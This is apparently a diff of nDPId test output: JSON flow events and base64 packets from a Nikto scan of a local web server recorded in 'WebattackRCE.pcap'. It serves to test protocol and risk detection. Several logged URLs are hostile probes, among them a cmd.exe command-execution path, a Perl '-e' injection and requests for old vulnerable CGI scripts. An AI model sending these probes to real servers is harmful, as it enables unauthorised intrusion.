+01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277513,"pkt":"AAAAAAAAAAAAAAAACABFAAC9L\/9AAEAGDDp\/AAABfwAAAcWuH5CdEhcgbNGBkoAYAED+sQAAAQEICp1m\/jGdZv4xR0VUIC93LWFnb3JhLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE4MykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}} +01047{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277515,"pkt":"AAAAAAAAAAAAAAAACABFAADcMJVAAEAGC4V\/AAABfwAAAcWwH5AAUQhya1uvboAYAED+0AAAAQEICp1m\/jOdZv4zR0VUIC9jZ2ktbG9jYWwvY2dpZW1haWwtMS42L2NnaWNzbz9xdWVyeT1BQUEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}} +01079{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7580000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":1,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277516,"pkt":"AAAAAAAAAAAAAAAACABFAADO6rNAAEAGUXR\/AAABfwAAAcWyH5BduNJTZLl5JoAYAED+wgAAAQEICp1m\/jSdZv40R0VUIC9zZXJ2bGV0L1NjaGVkdWxlclRyYW5zZmVyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDUpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000345)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00694{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":228,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":228,"pkt_l4_len":194,"thread_ts_msec":1576420277518,"pkt":"AAAAAAAAAAAAAAAACABFAADWgsZAAEAGuVl\/AAABfwAAAcW0H5A6eLoo9CriDoAYAED+ygAAAQEICp1m\/jWdZv41R0VUIC9zZXJ2bGV0L3N1bmV4YW1wbGVzLkJCb2FyZFNlcnZsZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}} +01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":525,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277518,"flow_last_seen":1576420277518,"flow_idle_time":7580000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420277518,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlet\/sunexamples.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000346)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277519,"pkt":"AAAAAAAAAAAAAAAACABFAADPVxFAAEAG5RV\/AAABfwAAAcW2H5BSXG\/tRc4oyoAYAED+wwAAAQEICp1m\/jedZv43R0VUIC9zZXJ2bGV0cy9TY2hlZHVsZXJUcmFuc2ZlciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDM0NykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":526,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277519,"flow_last_seen":1576420277519,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277519,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50614,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/servlets\/SchedulerTransfer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000347)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1576420277520,"pkt":"AAAAAAAAAAAAAAAACABFAADMFYpAAEAGJqB\/AAABfwAAAcW4H5AzUC1t6XmH4oAYAED+wAAAAQEICp1m\/jidZv44R0VUIC9wZXJsLy1lJTIwcHJpbnQlMjBIZWxsbyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMzUyKQ0KDQo="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277520,"flow_last_seen":1576420277520,"flow_idle_time":7580000,"flow_min_l4_payload_len":152,"flow_max_l4_payload_len":152,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":152,"midstream":1,"thread_ts_msec":1576420277520,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50616,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20print%20Hello","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000352)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277522,"pkt":"AAAAAAAAAAAAAAAACABFAADYfsdAAEAGvVZ\/AAABfwAAAcW6H5DDSkYijR1boIAYAED+zAAAAQEICp1m\/jqdZv46R0VUIC9jL3dpbm50L3N5c3RlbTMyL2NtZC5leGU\/L2MrZGlyKy9PRyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDQ5MSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}} +01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":528,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277522,"flow_last_seen":1576420277522,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277522,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50618,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/c\/winnt\/system32\/cmd.exe?\/c+dir+\/OG","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000491)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277525,"flow_last_seen":1576420277525,"flow_idle_time":7580000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277525,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50620,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 